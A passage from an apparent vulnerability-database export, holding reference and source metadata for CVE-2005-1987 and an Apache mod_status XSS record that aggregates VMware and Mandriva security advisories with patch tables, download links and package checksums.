            "url": "http://support.microsoft.com/default.aspx?scid=kb%3b%5bln%5d%3bq907245"
          },
          {
            "trust": 0.9,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-051.mspx"
          },
          {
            "trust": 0.8,
            "url": "http://www.microsoft.com/com/default.mspx"
          },
          {
            "trust": 0.8,
            "url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp"
          },
          {
            "trust": 0.8,
            "url": "http://support.microsoft.com/kb/159621"
          },
          {
            "trust": 0.8,
            "url": "http://support.microsoft.com/kb/216434"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/archive/1/391803"
          },
          {
            "trust": 0.8,
            "url": "http://www.kb.cert.org/vuls/id/939605"
          },
          {
            "trust": 0.8,
            "url": "http://www.kb.cert.org/vuls/id/740372"
          },
          {
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx"
          },
          {
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/16373/"
          },
          {
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-050.mspx"
          },
          {
            "trust": 0.8,
            "url": "http://eeye.com/html/research/advisories/ad20051011a.html"
          },
          {
            "trust": 0.8,
            "url": "about vulnerability notes"
          },
          {
            "trust": 0.8,
            "url": "contact us about this vulnerability"
          },
          {
            "trust": 0.8,
            "url": "provide a vendor statement"
          },
          {
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/advisory/906267.mspx"
          },
          {
            "trust": 0.8,
            "url": "http://www.kb.cert.org/vuls/id/680526"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/16480/"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/14594"
          },
          {
            "trust": 0.8,
            "url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html"
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/21895"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17161"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/15057"
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/22473"
          },
          {
            "trust": 0.8,
            "url": "http://osvdb.org/displayvuln.php?osvdb_id=19902"
          },
          {
            "trust": 0.8,
            "url": "http://www.f-secure.com/weblog/archives/archive-122005.html#00000737"
          },
          {
            "trust": 0.8,
            "url": "http://www.microsoft.com/technet/security/advisory/903144.mspx"
          },
          {
            "trust": 0.8,
            "url": "http://www.sec-consult.com/184.html"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/15891/ "
          },
          {
            "trust": 0.8,
            "url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/14087"
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/21193"
          },
          {
            "trust": 0.8,
            "url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2005-1987"
          },
          {
            "trust": 0.8,
            "url": "http://www.frsirt.com/english/advisories/2005/2045"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta05-284a/"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta05-284a/"
          },
          {
            "trust": 0.8,
            "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2005-1987"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/17167/"
          },
          {
            "trust": 0.6,
            "url": "http://support.microsoft.com/default.aspx?scid=kb;[ln];q907245"
          },
          {
            "trust": 0.5,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-048.mspx"
          },
          {
            "trust": 0.3,
            "url": "http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=bltndetail\u0026documentoid=361442\u0026renditionid="
          },
          {
            "trust": 0.3,
            "url": "..."
          },
          {
            "trust": 0.3,
            "url": "/archive/1/413159"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-1987"
          },
          {
            "trust": 0.2,
            "url": "http://www.sec-1.com/applied_hacking_course.html"
          },
          {
            "trust": 0.2,
            "url": "http://www.sec-1.com"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org),"
          },
          {
            "trust": 0.1,
            "url": "http://www.microsoft.com/downloads/details.aspx?familyid=1ff26142-6e1e-4e17-9dcd-994b339a69cf"
          },
          {
            "trust": 0.1,
            "url": "http://www.microsoft.com/downloads/details.aspx?familyid=554a86a5-0b03-4ca9-a32d-642e40570424"
          },
          {
            "trust": 0.1,
            "url": "http://www.microsoft.com/downloads/details.aspx?familyid=a6ec1352-042e-4ffb-b379-0e1c06ab9dbe"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/21/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1176/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1177/"
          },
          {
            "trust": 0.1,
            "url": "http://www.microsoft.com/downloads/details.aspx?familyid=ca202ccc-792e-4462-9a2f-a20d1f8607f7"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/about_secunia_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://www.microsoft.com/downloads/details.aspx?familyid=20f79ce7-d4db-42d7-8e57-58656a3fb2f7"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/22/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1175/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/16/"
          },
          {
            "trust": 0.1,
            "url": "http://www.microsoft.com/downloads/details.aspx?familyid=4e5b96d8-ba74-4008-80d9-922364abc6ac"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/20/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1173/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/product/1174/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/17161/"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/883460\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-0163"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-1987\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms05-oct.mspx\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2119\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-1978\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://update.microsoft.com/microsoftupdate\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.us-cert.gov/cas/\u003e."
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2128"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/180868\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2127\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2122"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/214572\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2119"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/959049\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/680526\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2122\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/950516\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-1978"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2128\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2120"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/922708\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-0163\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.kb.cert.org/vuls/id/995220\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=can-2005-2120\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.us-cert.gov/cas/techalerts/ta05-284a.html\u003e"
          },
          {
            "trust": 0.1,
            "url": "http://www.us-cert.gov/legal.html\u003e"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2127"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#680526"
          },
          {
            "db": "CERT/CC",
            "id": "VU#995220"
          },
          {
            "db": "CERT/CC",
            "id": "VU#883460"
          },
          {
            "db": "CERT/CC",
            "id": "VU#740372"
          },
          {
            "db": "CERT/CC",
            "id": "VU#950516"
          },
          {
            "db": "CERT/CC",
            "id": "VU#939605"
          },
          {
            "db": "BID",
            "id": "15067"
          },
          {
            "db": "PACKETSTORM",
            "id": "40623"
          },
          {
            "db": "PACKETSTORM",
            "id": "40726"
          },
          {
            "db": "PACKETSTORM",
            "id": "40674"
          },
          {
            "db": "PACKETSTORM",
            "id": "40619"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592"
          },
          {
            "db": "NVD",
            "id": "CVE-2005-1987"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#680526",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#995220",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#883460",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#740372",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#950516",
            "ident": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#939605",
            "ident": null
          },
          {
            "db": "BID",
            "id": "15067",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "40623",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "40726",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "40674",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "40619",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2005-000592",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2005-1987",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2005-08-19T00:00:00",
            "db": "CERT/CC",
            "id": "VU#680526",
            "ident": null
          },
          {
            "date": "2005-10-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#995220",
            "ident": null
          },
          {
            "date": "2005-10-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#883460",
            "ident": null
          },
          {
            "date": "2005-08-18T00:00:00",
            "db": "CERT/CC",
            "id": "VU#740372",
            "ident": null
          },
          {
            "date": "2005-10-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#950516",
            "ident": null
          },
          {
            "date": "2005-07-02T00:00:00",
            "db": "CERT/CC",
            "id": "VU#939605",
            "ident": null
          },
          {
            "date": "2005-10-11T00:00:00",
            "db": "BID",
            "id": "15067",
            "ident": null
          },
          {
            "date": "2005-10-12T01:58:20",
            "db": "PACKETSTORM",
            "id": "40623",
            "ident": null
          },
          {
            "date": "2005-10-15T00:40:55",
            "db": "PACKETSTORM",
            "id": "40726",
            "ident": null
          },
          {
            "date": "2005-10-12T18:16:30",
            "db": "PACKETSTORM",
            "id": "40674",
            "ident": null
          },
          {
            "date": "2005-10-12T01:55:17",
            "db": "PACKETSTORM",
            "id": "40619",
            "ident": null
          },
          {
            "date": "2005-10-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200510-082",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2005-000592",
            "ident": null
          },
          {
            "date": "2005-10-13T10:02:00",
            "db": "NVD",
            "id": "CVE-2005-1987",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2007-10-11T00:00:00",
            "db": "CERT/CC",
            "id": "VU#680526",
            "ident": null
          },
          {
            "date": "2005-10-14T00:00:00",
            "db": "CERT/CC",
            "id": "VU#995220",
            "ident": null
          },
          {
            "date": "2005-10-14T00:00:00",
            "db": "CERT/CC",
            "id": "VU#883460",
            "ident": null
          },
          {
            "date": "2005-10-13T00:00:00",
            "db": "CERT/CC",
            "id": "VU#740372",
            "ident": null
          },
          {
            "date": "2005-12-15T00:00:00",
            "db": "CERT/CC",
            "id": "VU#950516",
            "ident": null
          },
          {
            "date": "2005-07-12T00:00:00",
            "db": "CERT/CC",
            "id": "VU#939605",
            "ident": null
          },
          {
            "date": "2009-07-12T17:56:00",
            "db": "BID",
            "id": "15067",
            "ident": null
          },
          {
            "date": "2020-04-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200510-082",
            "ident": null
          },
          {
            "date": "2007-04-01T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2005-000592",
            "ident": null
          },
          {
            "date": "2025-04-03T01:03:51.193000",
            "db": "NVD",
            "id": "CVE-2005-1987",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "40619"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082"
          }
        ],
        "trust": 0.7
      },
      "title": {
        "_id": null,
        "data": "Microsoft Internet Explorer can use any COM object",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#680526"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200510-082"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200801-0561

    Vulnerability from variot - Updated: 2026-04-10 22:12

    Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Reportedly, attackers can also use this issue to redirect users' browsers to arbitrary locations, which may aid in phishing attacks. The issue affects versions prior to Apache 2.2.7-dev, 2.0.62-dev, and 1.3.40-dev. The HP Business Availability Center v8.02 kit is available on the HP Software Support Online portal at: http://support.openview.hp.com/support.jsp . Summary

    Updated VMware Hosted products address security issues in libpng and the Apace HTTP Server.

    1. Relevant releases

    VMware Workstation 6.5.2 and earlier, VMware Player 2.5.2 and earlier, VMware ACE 2.5.2 and earlier

    1. Problem Description

    a. Third Party Library libpng Updated to 1.2.35

    Several flaws were discovered in the way third party library libpng
    handled uninitialized pointers. An attacker could create a PNG image
    file in such a way, that when loaded by an application linked to
    libpng, it could cause the application to crash or execute arbitrary
    code at the privilege level of the user that runs the application.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the name CVE-2009-0040 to this issue.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    Workstation    6.5.x     any      6.5.3 build 185404 or later
    
    Player         2.5.x     any      2.5.3 build 185404 or later
    
    ACE            2.5.x     any      2.5.3 build 185404 or later
    
    Server         2.x       any      patch pending
    Server         1.x       any      patch pending
    
    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X not affected
    
    ESXi           4.0       ESXi     not affected
    ESXi           3.5       ESXi     not affected
    
    ESX            4.0       ESX      not affected
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected *
    
    * The libpng update for the Service Console of ESX 2.5.5 is
    documented in VMSA-2009-0007.
    

    b. Apache HTTP Server updated to 2.0.63

    The new version of ACE updates the Apache HTTP Server on Windows
    hosts to version 2.0.63 which addresses multiple security issues
    that existed in the previous versions of this server.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    has assigned the names CVE-2007-3847, CVE-2007-1863, CVE-2006-5752,
    CVE-2007-3304, CVE-2007-6388, CVE-2007-5000, CVE-2008-0005 to the
    issues that have been addressed by this update.
    
    The following table lists what action remediates the vulnerability
    (column 4) if a solution is available.
    
    VMware         Product   Running  Replace with/
    Product        Version   on       Apply Patch
    =============  ========  =======  =================
    VirtualCenter  any       Windows  not affected
    
    Workstation    6.5.x     any      not affected
    
    Player         2.5.x     any      not affected
    
    ACE            2.5.x     Windows  2.5.3 build 185404 or later
    ACE            2.5.x     Linux    update Apache on host system *
    
    Server         2.x       any      not affected
    Server         1.x       any      not affected
    
    Fusion         2.x       Mac OS/X not affected
    Fusion         1.x       Mac OS/X not affected
    
    ESXi           4.0       ESXi     not affected
    ESXi           3.5       ESXi     not affected
    
    ESX            4.0       ESX      not affected
    ESX            3.5       ESX      not affected
    ESX            3.0.3     ESX      not affected
    ESX            3.0.2     ESX      not affected
    ESX            2.5.5     ESX      not affected
    
    * The Apache HTTP Server is not part of an ACE install on a Linux
    host. Update the Apache HTTP Server on the host system to version
    2.0.63 in order to remediate the vulnerabilities listed above.
    
    1. Solution

    Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file.

    VMware Workstation 6.5.3


    http://www.vmware.com/download/ws/ Release notes: http://www.vmware.com/support/ws65/doc/releasenotes_ws653.html

    For Windows

    Workstation for Windows 32-bit and 64-bit Windows 32-bit and 64-bit .exe md5sum: 7565d16b7d7e0173b90c3b76ca4656bc sha1sum: 9f687afd8b0f39cde40aeceb3213a91be487aad1

    For Linux

    Workstation for Linux 32-bit Linux 32-bit .rpm md5sum: 4d55c491bd008ded0ea19f373d1d1fd4 sha1sum: 1f43131c960e76a530390d3b6984c78dfc2da23e

    Workstation for Linux 32-bit Linux 32-bit .bundle md5sum: d4a721c1918c0e8a87c6fa4bad49ad35 sha1sum: c0c6f9b56e70bd3ffdb5467ee176110e283a69e5

    Workstation for Linux 64-bit Linux 64-bit .rpm md5sum: 72adfdb03de4959f044fcb983412ae7c sha1sum: ba16163c8d9b5aa572526b34a7b63dc6e68f9bbb

    Workstation for Linux 64-bit Linux 64-bit .bundle md5sum: 83e1f0c94d6974286256c4d3b559e854 sha1sum: 8763f250a3ac5fc4698bd26319b93fecb498d542

    VMware Player 2.5.3


    http://www.vmware.com/download/player/ Release notes: http://www.vmware.com/support/player25/doc/releasenotes_player253.html

    Player for Windows binary

    http://download3.vmware.com/software/vmplayer/VMware-player-2.5.3-185404.exe md5sum: fe28f193374c9457752ee16cd6cad4e7 sha1sum: 13bd3ff93c04fa272544d3ef6de5ae746708af04

    Player for Linux (.rpm)

    http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.rpm md5sum: c99cd65f19fdfc7651bcb7f328b73bc2 sha1sum: a33231b26e2358a72d16e1b4e2656a5873fe637e

    Player for Linux (.bundle)

    http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.i386.bundle md5sum: 210f4cb5615bd3b2171bc054b9b2bac5 sha1sum: 2f6497890b17b37480165bab9f430e8645edae9b

    Player for Linux - 64-bit (.rpm)

    http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.rpm md5sum: f91576ef90b322d83225117ae9335968 sha1sum: f492fa9cf26ee2818f164aac04cde1680c25d974

    Player for Linux - 64-bit (.bundle)

    http://download3.vmware.com/software/vmplayer/VMware-Player-2.5.3-185404.x86_64.bundle md5sum: 595d44d7945c129b1aeb679d2f001b05 sha1sum: acd69fcb0c6bc49fd4af748c65c7fb730ab1e8c4

    VMware ACE 2.5.3


    http://www.vmware.com/download/ace/ Release notes: http://www.vmware.com/support/ace25/doc/releasenotes_ace253.html

    ACE Management Server Virtual Appliance AMS Virtual Appliance .zip md5sum: 44cc7b86353047f02cf6ea0653e38418 sha1sum: 9f44b15e6681a6e58dd20784f829c68091a62cd1

    VMware ACE for Windows 32-bit and 64-bit Windows 32-bit and 64-bit .exe md5sum: 0779da73408c5e649e0fd1c62d23820f sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef

    ACE Management Server for Windows Windows .exe md5sum: 0779da73408c5e649e0fd1c62d23820f sha1sum: 2b2e4963adc89f3b642874685f490222523b63ef

    ACE Management Server for SUSE Enterprise Linux 9 SLES 9 .rpm md5sum: a4fc92d7197f0d569361cdf4b8cca642 sha1sum: af8a135cca398cacaa82c8c3c325011c6cd3ed75

    ACE Management Server for Red Hat Enterprise Linux 4 RHEL 4 .rpm md5sum: 841005151338c8b954f08d035815fd58 sha1sum: 67e48624dba20e6be9e41ec9a5aba407dd8cc01e

    1. References

    CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6388 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5000 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0005


    1. Change log

    2009-08-20 VMSA-2009-0010 Initial security advisory after release of Workstation 6.5.3, Player 2.5.3, and ACE 2.5.3 on 2009-08-20.


    1. Contact

    E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

    This Security Advisory is posted to the following lists:

    • security-announce at lists.vmware.com
    • bugtraq at securityfocus.com
    • full-disclosure at lists.grok.org.uk

    E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

    VMware Security Center http://www.vmware.com/security

    VMware security response policy http://www.vmware.com/support/policies/security_response.html

    General support life cycle policy http://www.vmware.com/support/policies/eos.html

    VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

    Copyright 2009 VMware Inc. All rights reserved.

    A flaw found in the mod_status module could lead to a cross-site scripting attack on sites where mod_status was enabled and the status pages were publically available (CVE-2007-6388).

    A flaw found in the mod_proxy_balancer module could lead to a cross-site scripting attack against an authorized user on sites where mod_proxy_balancer was enabled (CVE-2007-6421).

    Another flaw in the mod_proxy_balancer module was found where, on sites with the module enabled, an authorized user could send a carefully crafted request that would cause the apache child process handling the request to crash, which could lead to a denial of service if using a threaded MPM (CVE-2007-6422).

    A flaw found in the mod_proxy_ftp module could lead to a cross-site scripting attack against web browsers which do not correctly derive the response character set following the rules in RFC 2616, on sites where the mod_proxy_ftp module was enabled (CVE-2008-0005).

    The updated packages have been patched to correct these issues.


    References:

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5000 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6388 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6421 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6422 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0005


    Updated Packages:

    Mandriva Linux 2007.0: 912f61ea5210fbb94d71eef7bb634903 2007.0/i586/apache-base-2.2.3-1.3mdv2007.0.i586.rpm cb04a945da63abf56db5b444a3360916 2007.0/i586/apache-devel-2.2.3-1.3mdv2007.0.i586.rpm f4c419b30cd6f6520d9c995b9edf7098 2007.0/i586/apache-htcacheclean-2.2.3-1.3mdv2007.0.i586.rpm 1a40e9af24dce5bec34c4264ae1bdce2 2007.0/i586/apache-mod_authn_dbd-2.2.3-1.3mdv2007.0.i586.rpm 333f116f1036dcc4a95612179f7a34bd 2007.0/i586/apache-mod_cache-2.2.3-1.3mdv2007.0.i586.rpm 717feaa8449934514872fde1dfb26ff8 2007.0/i586/apache-mod_dav-2.2.3-1.3mdv2007.0.i586.rpm 15d3661edb2fa693fcc16e890f2b25a1 2007.0/i586/apache-mod_dbd-2.2.3-1.3mdv2007.0.i586.rpm 90bdaeaea54a973f5e813a495d82b14b 2007.0/i586/apache-mod_deflate-2.2.3-1.3mdv2007.0.i586.rpm 52a5ee95962b1153467443fb608eb3d8 2007.0/i586/apache-mod_disk_cache-2.2.3-1.3mdv2007.0.i586.rpm 8a0a950bfe0ce68ca498761e120d05da 2007.0/i586/apache-mod_file_cache-2.2.3-1.3mdv2007.0.i586.rpm 4f6b84375fd94d4467a3e3088de26a80 2007.0/i586/apache-mod_ldap-2.2.3-1.3mdv2007.0.i586.rpm fa98d84669215b56d3f64450af0d0f5d 2007.0/i586/apache-mod_mem_cache-2.2.3-1.3mdv2007.0.i586.rpm 665f988fa0cc99b4b55b01565a2d3075 2007.0/i586/apache-mod_proxy-2.2.3-1.3mdv2007.0.i586.rpm a22e15e33709ec0fff4c453643094031 2007.0/i586/apache-mod_proxy_ajp-2.2.3-1.3mdv2007.0.i586.rpm cca659746b2601dc61f8382c64d40206 2007.0/i586/apache-mod_ssl-2.2.3-1.3mdv2007.0.i586.rpm 208d8db690290b848c266593324c2a75 2007.0/i586/apache-mod_userdir-2.2.3-1.3mdv2007.0.i586.rpm 92a1be6ec8e7a0b274666ea7b2c8c47f 2007.0/i586/apache-modules-2.2.3-1.3mdv2007.0.i586.rpm 71670f17ade1c090567f4850c796bdef 2007.0/i586/apache-mpm-prefork-2.2.3-1.3mdv2007.0.i586.rpm dd78ed04d011e11e8872c606d4edfa93 2007.0/i586/apache-mpm-worker-2.2.3-1.3mdv2007.0.i586.rpm eb5785a9e04f14ac7788d43d18c39fcc 2007.0/i586/apache-source-2.2.3-1.3mdv2007.0.i586.rpm f066c405e8993de4fa506d8c05d37b9e 2007.0/SRPMS/apache-2.2.3-1.3mdv2007.0.src.rpm

    Mandriva Linux 2007.0/X86_64: b25f0ae69e8be8c807afb36a5b58e4a7 2007.0/x86_64/apache-base-2.2.3-1.3mdv2007.0.x86_64.rpm ec93723ef9b7a5e62dc6704461e2b034 2007.0/x86_64/apache-devel-2.2.3-1.3mdv2007.0.x86_64.rpm 200fac36fbd67d6cd1857272aa5147e7 2007.0/x86_64/apache-htcacheclean-2.2.3-1.3mdv2007.0.x86_64.rpm ac7ec3a712d56ce1a076f29439c042d4 2007.0/x86_64/apache-mod_authn_dbd-2.2.3-1.3mdv2007.0.x86_64.rpm 126f880a37723b316f13f01c612883c5 2007.0/x86_64/apache-mod_cache-2.2.3-1.3mdv2007.0.x86_64.rpm 69460daf3173b6c9f0d9f84c3597d81a 2007.0/x86_64/apache-mod_dav-2.2.3-1.3mdv2007.0.x86_64.rpm 52cf72324ae29121fe2e2c955808791f 2007.0/x86_64/apache-mod_dbd-2.2.3-1.3mdv2007.0.x86_64.rpm 17517cc4f69dec1f4ba1c08b242526e4 2007.0/x86_64/apache-mod_deflate-2.2.3-1.3mdv2007.0.x86_64.rpm a5a27827a3f488b9f31a231aad43eae7 2007.0/x86_64/apache-mod_disk_cache-2.2.3-1.3mdv2007.0.x86_64.rpm f413791db00e648dc0fae00336340bf0 2007.0/x86_64/apache-mod_file_cache-2.2.3-1.3mdv2007.0.x86_64.rpm 9d74a9b5ff153557cf361ca1726fd9b1 2007.0/x86_64/apache-mod_ldap-2.2.3-1.3mdv2007.0.x86_64.rpm b8fde6545785d79344d5a85b7bd88903 2007.0/x86_64/apache-mod_mem_cache-2.2.3-1.3mdv2007.0.x86_64.rpm da3a732c1e41e62207085aefcd0fb99c 2007.0/x86_64/apache-mod_proxy-2.2.3-1.3mdv2007.0.x86_64.rpm df716921b9736859a712dea86b22c3f5 2007.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.3mdv2007.0.x86_64.rpm c69fd37756dbe81df897396e6c6413de 2007.0/x86_64/apache-mod_ssl-2.2.3-1.3mdv2007.0.x86_64.rpm a24b51c168be4a5d57a1d1b5a1401f83 2007.0/x86_64/apache-mod_userdir-2.2.3-1.3mdv2007.0.x86_64.rpm e481d9ceb7ffa6a6299417a6f7874c07 2007.0/x86_64/apache-modules-2.2.3-1.3mdv2007.0.x86_64.rpm 0917c7d2edab62a4c62e4dd6136dec93 2007.0/x86_64/apache-mpm-prefork-2.2.3-1.3mdv2007.0.x86_64.rpm a98b13300b903a0219dc9de626ea1bbe 